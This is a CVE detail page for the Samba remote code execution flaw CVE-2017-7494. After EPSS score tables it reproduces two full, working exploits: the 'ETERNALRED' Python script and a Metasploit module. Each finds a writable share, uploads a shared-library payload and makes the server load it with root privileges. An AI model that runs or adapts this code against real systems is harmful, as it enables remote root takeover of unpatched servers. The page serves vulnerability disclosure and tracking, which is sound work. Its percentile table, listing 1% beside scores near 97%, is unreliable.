CVE-2017-7494 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2021-04-18	72.61%	–	–	–	–
2021-09-05	–	72.61%	–	–	–
2022-02-06	–	–	95.65%	–	–
2023-02-05	–	–	94.95%	–	–
2023-02-19	–	–	95.65%	–	–
2023-03-12	–	–	–	97.4%	–
2023-03-19	–	–	–	97.39%	–
2023-04-02	–	–	–	97.37%	–
2023-04-09	–	–	–	97.4%	–
2023-05-14	–	–	–	97.22%	–
2023-07-09	–	–	–	97.36%	–
2023-07-30	–	–	–	97.28%	–
2023-09-03	–	–	–	97.26%	–
2024-06-02	–	–	–	97.26%	–
2024-07-28	–	–	–	97.25%	–
2024-09-01	–	–	–	97.27%	–
2024-11-10	–	–	–	97.16%	–
2024-12-22	–	–	–	97.19%	–
2025-01-19	–	–	–	97.3%	–
2025-01-19	–	–	–	97.3%	–
2025-03-18	–	–	–	–	94.3%
2025-03-18	–	–	–	–	94.3,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2021-04-18	–
2021-09-05	1%
2022-02-06	1%
2023-02-05	1%
2023-02-19	1%
2023-03-12	1%
2023-03-19	1%
2023-04-02	1%
2023-04-09	1%
2023-05-14	1%
2023-07-09	1%
2023-07-30	1%
2023-09-03	1%
2024-06-02	1%
2024-07-28	1%
2024-09-01	1%
2024-11-10	1%
2024-12-22	1%
2025-01-19	1%
2025-01-19	1%
2025-03-18	1%
2025-03-18	1%

#!/usr/bin/env python # Title : ETERNALRED # Date: 05/24/2017 # Exploit Author: steelo <knownsteelo@gmail.com> # Vendor Homepage: https://www.samba.org # Samba 3.5.0 - 4.5.4/4.5.10/4.4.14 # CVE-2017-7494 import argparse import os.path import sys import tempfile import time from smb.SMBConnection import SMBConnection from smb import smb_structs from smb.base import _PendingRequest from smb.smb2_structs import * from smb.base import * class SharedDevice2(SharedDevice): def __init__(self, type, name, comments, path, password): super().__init__(type, name, comments) self.path = path self.password = password class SMBConnectionEx(SMBConnection): def __init__(self, username, password, my_name, remote_name, domain="", use_ntlm_v2=True, sign_options=2, is_direct_tcp=False): super().__init__(username, password, my_name, remote_name, domain, use_ntlm_v2, sign_options, is_direct_tcp) def hook_listShares(self): self._listShares = self.listSharesEx def hook_retrieveFile(self): self._retrieveFileFromOffset = self._retrieveFileFromOffset_SMB1Unix # This is maily the original listShares but request a higher level of info def listSharesEx(self, callback, errback, timeout = 30): if not self.has_authenticated: raise NotReadyError('SMB connection not authenticated') expiry_time = time.time() + timeout path = 'IPC$' messages_history = [ ] def connectSrvSvc(tid): m = SMB2Message(SMB2CreateRequest('srvsvc', file_attributes = 0, access_mask = FILE_READ_DATA | FILE_WRITE_DATA | FILE_APPEND_DATA | FILE_READ_EA | FILE_WRITE_EA | READ_CONTROL | FILE_READ_ATTRIBUTES | FILE_WRITE_ATTRIBUTES | SYNCHRONIZE, share_access = FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, oplock = SMB2_OPLOCK_LEVEL_NONE, impersonation = SEC_IMPERSONATE, create_options = FILE_NON_DIRECTORY_FILE | FILE_OPEN_NO_RECALL, create_disp = FILE_OPEN)) m.tid = tid self._sendSMBMessage(m) self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, connectSrvSvcCB, errback) messages_history.append(m) def connectSrvSvcCB(create_message, **kwargs): messages_history.append(create_message) if create_message.status == 0: call_id = self._getNextRPCCallID() # The data_bytes are binding call to Server Service RPC using DCE v1.1 RPC over SMB. See [MS-SRVS] and [C706] # If you wish to understand the meanings of the byte stream, I would suggest you use a recent version of WireShark to packet capture the stream data_bytes = \ binascii.unhexlify(b"""05 00 0b 03 10 00 00 00 74 00 00 00""".replace(b' ', b'')) + \ struct.pack('<I', call_id) + \ binascii.unhexlify(b""" b8 10 b8 10 00 00 00 00 02 00 00 00 00 00 01 00 c8 4f 32 4b 70 16 d3 01 12 78 5a 47 bf 6e e1 88 03 00 00 00 04 5d 88 8a eb 1c c9 11 9f e8 08 00 2b 10 48 60 02 00 00 00 01 00 01 00 c8 4f 32 4b 70 16 d3 01 12 78 5a 47 bf 6e e1 88 03 00 00 00 2c 1c b7 6c 12 98 40 45 03 00 00 00 00 00 00 00 01 00 00 00 """.replace(b' ', b'').replace(b'\n', b'')) m = SMB2Message(SMB2WriteRequest(create_message.payload.fid, data_bytes, 0)) m.tid = create_message.tid self._sendSMBMessage(m) self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, rpcBindCB, errback, fid = create_message.payload.fid) messages_history.append(m) else: errback(OperationFailure('Failed to list shares: Unable to locate Server Service RPC endpoint', messages_history)) def rpcBindCB(trans_message, **kwargs): messages_history.append(trans_message) if trans_message.status == 0: m = SMB2Message(SMB2ReadRequest(kwargs['fid'], read_len = 1024, read_offset = 0)) m.tid = trans_message.tid self._sendSMBMessage(m) self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, rpcReadCB, errback, fid = kwargs['fid']) messages_history.append(m) else: closeFid(trans_message.tid, kwargs['fid'], error = 'Failed to list shares: Unable to read from Server Service RPC endpoint') def rpcReadCB(read_message, **kwargs): messages_history.append(read_message) if read_message.status == 0: call_id = self._getNextRPCCallID() padding = b'' remote_name = '\\\\' + self.remote_name server_len = len(remote_name) + 1 server_bytes_len = server_len * 2 if server_len % 2 != 0: padding = b'\0\0' server_bytes_len += 2 # The data bytes are the RPC call to NetrShareEnum (Opnum 15) at Server Service RPC. # If you wish to understand the meanings of the byte stream, I would suggest you use a recent version of WireShark to packet capture the stream data_bytes = \ binascii.unhexlify(b"""05 00 00 03 10 00 00 00""".replace(b' ', b'')) + \ struct.pack('<HHI', 72+server_bytes_len, 0, call_id) + \ binascii.unhexlify(b"""4c 00 00 00 00 00 0f 00 00 00 02 00""".replace(b' ', b'')) + \ struct.pack('<III', server_len, 0, server_len) + \ (remote_name + '\0').encode('UTF-16LE') + padding + \ binascii.unhexlify(b""" 02 00 00 00 02 00 00 00 04 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 """.replace(b' ', b'').replace(b'\n', b'')) m = SMB2Message(SMB2IoctlRequest(kwargs['fid'], 0x0011C017, flags = 0x01, max_out_size = 8196, in_data = data_bytes)) m.tid = read_message.tid self._sendSMBMessage(m) self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, listShareResultsCB, errback, fid = kwargs['fid']) messages_history.append(m) else: closeFid(read_message.tid, kwargs['fid'], error = 'Failed to list shares: Unable to bind to Server Service RPC endpoint') def listShareResultsCB(result_message, **kwargs): messages_history.append(result_message) if result_message.status == 0: # The payload.data_bytes will contain the results of the RPC call to NetrShareEnum (Opnum 15) at Server Service RPC. data_bytes = result_message.payload.out_data if data_bytes[3] & 0x02 == 0: sendReadRequest(result_message.tid, kwargs['fid'], data_bytes) else: decodeResults(result_message.tid, kwargs['fid'], data_bytes) elif result_message.status == 0x0103: # STATUS_PENDING self.pending_requests[result_message.mid] = _PendingRequest(result_message.mid, expiry_time, listShareResultsCB, errback, fid = kwargs['fid']) else: closeFid(result_message.tid, kwargs['fid']) errback(OperationFailure('Failed to list shares: Unable to retrieve shared device list', messages_history)) def decodeResults(tid, fid, data_bytes): shares_count = struct.unpack('<I', data_bytes[36:40])[0] results = [ ] # A list of SharedDevice2 instances offset = 36 + 52 # You need to study the byte stream to understand the meaning of these constants for i in range(0, shares_count): results.append(SharedDevice(struct.unpack('<I', data_bytes[offset+4:offset+8])[0], None, None)) offset += 12 for i in range(0, shares_count): max_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12]) offset += 12 results[i].name = data_bytes[offset:offset+length*2-2].decode('UTF-16LE') if length % 2 != 0: offset += (length * 2 + 2) else: offset += (length * 2) max_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12]) offset += 12 results[i].comments = data_bytes[offset:offset+length*2-2].decode('UTF-16LE') if length % 2 != 0: offset += (length * 2 + 2) else: offset += (length * 2) max_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12]) offset += 12 results[i].path = data_bytes[offset:offset+length*2-2].decode('UTF-16LE') if length % 2 != 0: offset += (length * 2 + 2) else: offset += (length * 2) max_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12]) offset += 12 results[i].password = data_bytes[offset:offset+length*2-2].decode('UTF-16LE') if length % 2 != 0: offset += (length * 2 + 2) else: offset += (length * 2) closeFid(tid, fid) callback(results) def sendReadRequest(tid, fid, data_bytes): read_count = min(4280, self.max_read_size) m = SMB2Message(SMB2ReadRequest(fid, 0, read_count)) m.tid = tid self._sendSMBMessage(m) self.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, readCB, errback, fid = fid, data_bytes = data_bytes) def readCB(read_message, **kwargs): messages_history.append(read_message) if read_message.status == 0: data_len = read_message.payload.data_length data_bytes = read_message.payload.data if data_bytes[3] & 0x02 == 0: sendReadRequest(read_message.tid, kwargs['fid'], kwargs['data_bytes'] + data_bytes[24:data_len-24]) else: decodeResults(read_message.tid, kwargs['fid'], kwargs['data_bytes'] + data_bytes[24:data_len-24]) else: closeFid(read_message.tid, kwargs['fid']) errback(OperationFailure('Failed to list shares: Unable to retrieve shared device list', messages_history)) def closeFid(tid, fid, results = None, error = None): m = SMB2Message(SMB2CloseRequest(fid)) m.tid = tid self._sendSMBMessage(m) self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, closeCB, errback, results = results, error = error) messages_history.append(m) def closeCB(close_message, **kwargs): if kwargs['results'] is not None: callback(kwargs['results']) elif kwargs['error'] is not None: errback(OperationFailure(kwargs['error'], messages_history)) if path not in self.connected_trees: def connectCB(connect_message, **kwargs): messages_history.append(connect_message) if connect_message.status == 0: self.connected_trees[path] = connect_message.tid connectSrvSvc(connect_message.tid) else: errback(OperationFailure('Failed to list shares: Unable to connect to IPC$', messages_history)) m = SMB2Message(SMB2TreeConnectRequest(r'\\%s\%s' % ( self.remote_name.upper(), path ))) self._sendSMBMessage(m) self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, connectCB, errback, path = path) messages_history.append(m) else: connectSrvSvc(self.connected_trees[path]) # Don't convert to Window style path def _retrieveFileFromOffset_SMB1Unix(self, service_name, path, file_obj, callback, errback, starting_offset, max_length, timeout = 30): if not self.has_authenticated: raise NotReadyError('SMB connection not authenticated') messages_history = [ ] def sendOpen(tid): m = SMBMessage(ComOpenAndxRequest(filename = path, access_mode = 0x0040, # Sharing mode: Deny nothing to others open_mode = 0x0001, # Failed if file does not exist search_attributes = SMB_FILE_ATTRIBUTE_HIDDEN | SMB_FILE_ATTRIBUTE_SYSTEM, timeout = timeout * 1000)) m.tid = tid self._sendSMBMessage(m) self.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, openCB, errback) messages_history.append(m) def openCB(open_message, **kwargs): messages_history.append(open_message) if not open_message.status.hasError: if max_length == 0: closeFid(open_message.tid, open_message.payload.fid) callback(( file_obj, open_message.payload.file_attributes, 0 )) else: sendRead(open_message.tid, open_message.payload.fid, starting_offset, open_message.payload.file_attributes, 0, max_length) else: errback(OperationFailure('Failed to retrieve %s on %s: Unable to open file' % ( path, service_name ), messages_history)) def sendRead(tid, fid, offset, file_attributes, read_len, remaining_len): read_count = self.max_raw_size - 2 m = SMBMessage(ComReadAndxRequest(fid = fid, offset = offset, max_return_bytes_count = read_count, min_return_bytes_count = min(0xFFFF, read_count))) m.tid = tid self._sendSMBMessage(m) self.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, readCB, errback, fid = fid, offset = offset, file_attributes = file_attributes, read_len = read_len, remaining_len = remaining_len) def readCB(read_message, **kwargs): # To avoid crazy memory usage when retrieving large files, we do not save every read_message in messages_history. if not read_message.status.hasError: read_len = kwargs['read_len'] remaining_len = kwargs['remaining_len'] data_len = read_message.payload.data_length if max_length > 0: if data_len > remaining_len: file_obj.write(read_message.payload.data[:remaining_len]) read_len += remaining_len remaining_len = 0 else: file_obj.write(read_message.payload.data) remaining_len -= data_len read_len += data_len else: file_obj.write(read_message.payload.data) read_len += data_len if (max_length > 0 and remaining_len <= 0) or data_len < (self.max_raw_size - 2): closeFid(read_message.tid, kwargs['fid']) callback(( file_obj, kwargs['file_attributes'], read_len )) # Note that this is a tuple of 3-elements else: sendRead(read_message.tid, kwargs['fid'], kwargs['offset']+data_len, kwargs['file_attributes'], read_len, remaining_len) else: messages_history.append(read_message) closeFid(read_message.tid, kwargs['fid']) errback(OperationFailure('Failed to retrieve %s on %s: Read failed' % ( path, service_name ), messages_history)) def closeFid(tid, fid): m = SMBMessage(ComCloseRequest(fid)) m.tid = tid self._sendSMBMessage(m) messages_history.append(m) if service_name not in self.connected_trees: def connectCB(connect_message, **kwargs): messages_history.append(connect_message) if not connect_message.status.hasError: self.connected_trees[service_name] = connect_message.tid sendOpen(connect_message.tid) else: errback(OperationFailure('Failed to retrieve %s on %s: Unable to connect to shared device' % ( path, service_name ), messages_history)) m = SMBMessage(ComTreeConnectAndxRequest(r'\\%s\%s' % ( self.remote_name.upper(), service_name ), SERVICE_ANY, '')) self._sendSMBMessage(m) self.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, connectCB, errback, path = service_name) messages_history.append(m) else: sendOpen(self.connected_trees[service_name]) def get_connection(user, password, server, port, force_smb1=False): if force_smb1: smb_structs.SUPPORT_SMB2 = False conn = SMBConnectionEx(user, password, "", "server") assert conn.connect(server, port) return conn def get_share_info(conn): conn.hook_listShares() return conn.listShares() def find_writeable_share(conn, shares): print("[+] Searching for writable share") filename = "red" test_file = tempfile.TemporaryFile() for share in shares: try: # If it's not writeable this will throw conn.storeFile(share.name, filename, test_file) conn.deleteFiles(share.name, filename) print("[+] Found writeable share: " + share.name) return share except: pass return None def write_payload(conn, share, payload, payload_name): with open(payload, "rb") as fin: conn.storeFile(share.name, payload_name, fin) return True def convert_share_path(share): path = share.path[2:] path = path.replace("\\", "/") return path def load_payload(user, password, server, port, fullpath): conn = get_connection(user, password, server, port, force_smb1 = True) conn.hook_retrieveFile() print("[+] Attempting to load payload") temp_file = tempfile.TemporaryFile() try: conn.retrieveFile("IPC$", "\\\\PIPE\\" + fullpath, temp_file) except: pass return def drop_payload(user, password, server, port, payload): payload_name = "charizard" conn = get_connection(user, password, server, port) shares = get_share_info(conn) share = find_writeable_share(conn, shares) if share is None: print("[!] No writeable shares on " + server + " for user: " + user) sys.exit(-1) if not write_payload(conn, share, payload, payload_name): print("[!] Failed to write payload: " + str(payload) + " to server") sys.exit(-1) conn.close() fullpath = convert_share_path(share) return os.path.join(fullpath, payload_name) def main(): parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, description= """Eternal Red Samba Exploit -- CVE-2017-7494 Causes vulnerable Samba server to load a shared library in root context Credentials are not required if the server has a guest account For remote exploit you must have write permissions to at least one share Eternal Red will scan the Samba server for shares it can write to It will also determine the fullpath of the remote share For local exploit provide the full path to your shared library to load Your shared library should look something like this extern bool change_to_root_user(void); int samba_init_module(void) { change_to_root_user(); /* Do what thou wilt */ } """) parser.add_argument("payload", help="path to shared library to load", type=str) parser.add_argument("server", help="Server to target", type=str) parser.add_argument("-p", "--port", help="Port to use defaults to 445", type=int) parser.add_argument("-u", "--username", help="Username to connect as defaults to nobody", type=str) parser.add_argument("--password", help="Password for user default is empty", type=str) parser.add_argument("--local", help="Perform local attack. Payload should be fullpath!", type=bool) args = parser.parse_args() if not os.path.isfile(args.payload): print("[!] Unable to open: " + args.payload) sys.exit(-1) port = 445 user = "nobody" password = "" fullpath = "" if args.port: port = args.port if args.username: user = args.username if args.password: password = args.password if args.local: fullpath = args.payload else: fullpath = drop_payload(user, password, args.server, port, args.payload) load_payload(user, password, args.server, port, fullpath) if __name__ == "__main__": main()

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB::Client def initialize(info = {}) super(update_info(info, 'Name' => 'Samba is_known_pipename() Arbitrary Module Load', 'Description' => %q{ This module triggers an arbitrary shared library load vulnerability in Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4. This module requires valid credentials, a writeable folder in an accessible share, and knowledge of the server-side path of the writeable folder. In some cases, anonymous access combined with common filesystem locations can be used to automatically exploit this vulnerability. }, 'Author' => [ 'steelo <knownsteelo[at]gmail.com>', # Vulnerability Discovery 'hdm', # Metasploit Module 'Brendan Coles <bcoles[at]gmail.com>', # Check logic 'Tavis Ormandy <taviso[at]google.com>', # PID hunting technique ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2017-7494' ], [ 'URL', 'https://www.samba.org/samba/security/CVE-2017-7494.html' ], ], 'Payload' => { 'Space' => 9000, 'DisableNops' => true }, 'Platform' => 'linux', # # Targets are currently limited by platforms with ELF-SO payload wrappers # 'Targets' => [ [ 'Linux x86', { 'Arch' => ARCH_X86 } ], [ 'Linux x86_64', { 'Arch' => ARCH_X64 } ], # # Not ready yet # [ 'Linux ARM (LE)', { 'Arch' => ARCH_ARMLE } ], # [ 'Linux MIPS', { 'Arch' => MIPS } ], ], 'Privileged' => true, 'DisclosureDate' => 'Mar 24 2017', 'DefaultTarget' => 1)) register_options( [ OptString.new('SMB_SHARE_NAME', [false, 'The name of the SMB share containing a writeable directory']), OptString.new('SMB_SHARE_BASE', [false, 'The remote filesystem path correlating with the SMB share name']), OptString.new('SMB_FOLDER', [false, 'The directory to use within the writeable SMB share']), ]) register_advanced_options( [ OptBool.new('BruteforcePID', [false, 'Attempt to use two connections to bruteforce the PID working directory', false]), ]) end def generate_common_locations candidates = [] if datastore['SMB_SHARE_BASE'].to_s.length > 0 candidates << datastore['SMB_SHARE_BASE'] end %W{ /volume1 /volume2 /volume3 /volume4 /shared /mnt /mnt/usb /media /mnt/media /var/samba /tmp /home /home/shared }.each do |base_name| candidates << base_name candidates << [base_name, @share] candidates << [base_name, @share.downcase] candidates << [base_name, @share.upcase] candidates << [base_name, @share.capitalize] candidates << [base_name, @share.gsub(" ", "_")] end candidates.uniq end def enumerate_directories(share) begin self.simple.connect("\\\\#{rhost}\\#{share}") stuff = self.simple.client.find_first("\\*") directories = [""] stuff.each_pair do |entry,entry_attr| next if %W{. ..}.include?(entry) next unless entry_attr['type'] == 'D' directories << entry end return directories rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e vprint_error("Enum #{share}: #{e}") return nil ensure if self.simple.shares["\\\\#{rhost}\\#{share}"] self.simple.disconnect("\\\\#{rhost}\\#{share}") end end end def verify_writeable_directory(share, directory="") begin self.simple.connect("\\\\#{rhost}\\#{share}") random_filename = Rex::Text.rand_text_alpha(5)+".txt" filename = directory.length == 0 ? "\\#{random_filename}" : "\\#{directory}\\#{random_filename}" wfd = simple.open(filename, 'rwct') wfd << Rex::Text.rand_text_alpha(8) wfd.close simple.delete(filename) return true rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e vprint_error("Write #{share}#{filename}: #{e}") return false ensure if self.simple.shares["\\\\#{rhost}\\#{share}"] self.simple.disconnect("\\\\#{rhost}\\#{share}") end end end def share_type(val) [ 'DISK', 'PRINTER', 'DEVICE', 'IPC', 'SPECIAL', 'TEMPORARY' ][val] end def enumerate_shares_lanman shares = [] begin res = self.simple.client.trans( "\\PIPE\\LANMAN", ( [0x00].pack('v') + "WrLeh\x00" + "B13BWz\x00" + [0x01, 65406].pack("vv") )) rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e vprint_error("Could not enumerate shares via LANMAN") return [] end if res.nil? vprint_error("Could not enumerate shares via LANMAN") return [] end lerror, lconv, lentries, lcount = res['Payload'].to_s[ res['Payload'].v['ParamOffset'], res['Payload'].v['ParamCount'] ].unpack("v4") data = res['Payload'].to_s[ res['Payload'].v['DataOffset'], res['Payload'].v['DataCount'] ] 0.upto(lentries - 1) do |i| sname,tmp = data[(i * 20) + 0, 14].split("\x00") stype = data[(i * 20) + 14, 2].unpack('v')[0] scoff = data[(i * 20) + 16, 2].unpack('v')[0] scoff -= lconv if lconv != 0 scomm,tmp = data[scoff, data.length - scoff].split("\x00") shares << [ sname, share_type(stype), scomm] end shares end def probe_module_path(path, simple_client=self.simple) begin simple_client.create_pipe(path) rescue Rex::Proto::SMB::Exceptions::ErrorCode => e vprint_error("Probe: #{path}: #{e}") end end def find_writeable_path(share) subdirs = enumerate_directories(share) return unless subdirs if datastore['SMB_FOLDER'].to_s.length > 0 subdirs.unshift(datastore['SMB_FOLDER']) end subdirs.each do |subdir| next unless verify_writeable_directory(share, subdir) return subdir end nil end def find_writeable_share_path @path = nil share_info = enumerate_shares_lanman if datastore['SMB_SHARE_NAME'].to_s.length > 0 share_info.unshift [datastore['SMB_SHARE_NAME'], 'DISK', ''] end share_info.each do |share| next if share.first.upcase == 'IPC$' found = find_writeable_path(share.first) next unless found @share = share.first @path = found break end end def find_writeable find_writeable_share_path unless @share && @path print_error("No suiteable share and path were found, try setting SMB_SHARE_NAME and SMB_FOLDER") fail_with(Failure::NoTarget, "No matching target") end print_status("Using location \\\\#{rhost}\\#{@share}\\#{@path} for the path") end def upload_payload begin self.simple.connect("\\\\#{rhost}\\#{@share}") random_filename = Rex::Text.rand_text_alpha(8)+".so" filename = @path.length == 0 ? "\\#{random_filename}" : "\\#{@path}\\#{random_filename}" wfd = simple.open(filename, 'rwct') wfd << Msf::Util::EXE.to_executable_fmt(framework, target.arch, target.platform, payload.encoded, "elf-so", {:arch => target.arch, :platform => target.platform} ) wfd.close @payload_name = random_filename return true rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e print_error("Write #{@share}#{filename}: #{e}") return false ensure if self.simple.shares["\\\\#{rhost}\\#{@share}"] self.simple.disconnect("\\\\#{rhost}\\#{@share}") end end end def find_payload # Reconnect to IPC$ simple.connect("\\\\#{rhost}\\IPC$") # Look for common paths first, since they can be a lot quicker than hunting PIDs print_status("Hunting for payload using common path names: #{@payload_name} - //#{rhost}/#{@share}/#{@path}") generate_common_locations.each do |location| target = [location, @path, @payload_name].join("/").gsub(/\/+/, '/') print_status("Trying location #{target}...") probe_module_path(target) end # Exit early if we already have a session return if session_created? return unless datastore['BruteforcePID'] # XXX: This technique doesn't seem to work in practice, as both processes have setuid()d # to non-root, but their /proc/pid directories are still owned by root. Trying to # read the /proc/other-pid/cwd/target.so results in permission denied. There is a # good chance that this still works on some embedded systems and odd-ball Linux. # Use the PID hunting strategy devised by Tavis Ormandy print_status("Hunting for payload using PID search: #{@payload_name} - //#{rhost}/#{@share}/#{@path} (UNLIKELY TO WORK!)") # Configure the main connection to have a working directory of the file share simple.connect("\\\\#{rhost}\\#{@share}") # Use a second connection to brute force the PID of the first connection probe_conn = connect(false) smb_login(probe_conn) probe_conn.connect("\\\\#{rhost}\\#{@share}") probe_conn.connect("\\\\#{rhost}\\IPC$") # Run from 2 to MAX_PID (ushort) trying to read the other process CWD 2.upto(32768) do |pid| # Look for the PID associated with our main SMB connection target = ["/proc/#{pid}/cwd", @path, @payload_name].join("/").gsub(/\/+/, '/') vprint_status("Trying PID with target path #{target}...") probe_module_path(target, probe_conn) # Keep our main connection alive if pid % 1000 == 0 self.simple.client.find_first("\\*") end end end def check res = smb_fingerprint unless res['native_lm'] =~ /Samba ([\d\.]+)/ print_error("does not appear to be Samba: #{res['os']} / #{res['native_lm']}") return CheckCode::Safe end samba_version = Gem::Version.new($1.gsub(/\.$/, '')) vprint_status("Samba version identified as #{samba_version.to_s}") if samba_version < Gem::Version.new('3.5.0') return CheckCode::Safe end # Patched in 4.4.14 if samba_version < Gem::Version.new('4.5.0') && samba_version >= Gem::Version.new('4.4.14') return CheckCode::Safe end # Patched in 4.5.10 if samba_version > Gem::Version.new('4.5.0') && samba_version < Gem::Version.new('4.6.0') && samba_version >= Gem::Version.new('4.5.10') return CheckCode::Safe end # Patched in 4.6.4 if samba_version >= Gem::Version.new('4.6.4') return CheckCode::Safe end connect smb_login find_writeable_share_path disconnect if @share.to_s.length == 0 print_status("Samba version #{samba_version.to_s} found, but no writeable share has been identified") return CheckCode::Detected end print_good("Samba version #{samba_version.to_s} found with writeable share '#{@share}'") return CheckCode::Appears end def exploit # Setup SMB connect smb_login # Find a writeable share find_writeable # Upload the shared library payload upload_payload # Find and execute the payload from the share begin find_payload rescue Rex::StreamClosedError, Rex::Proto::SMB::Exceptions::NoReply end # Cleanup the payload begin simple.connect("\\\\#{rhost}\\#{@share}") uploaded_path = @path.length == 0 ? "\\#{@payload_name}" : "\\#{@path}\\#{@payload_name}" simple.delete(uploaded_path) rescue Rex::StreamClosedError, Rex::Proto::SMB::Exceptions::NoReply end # Shutdown disconnect end end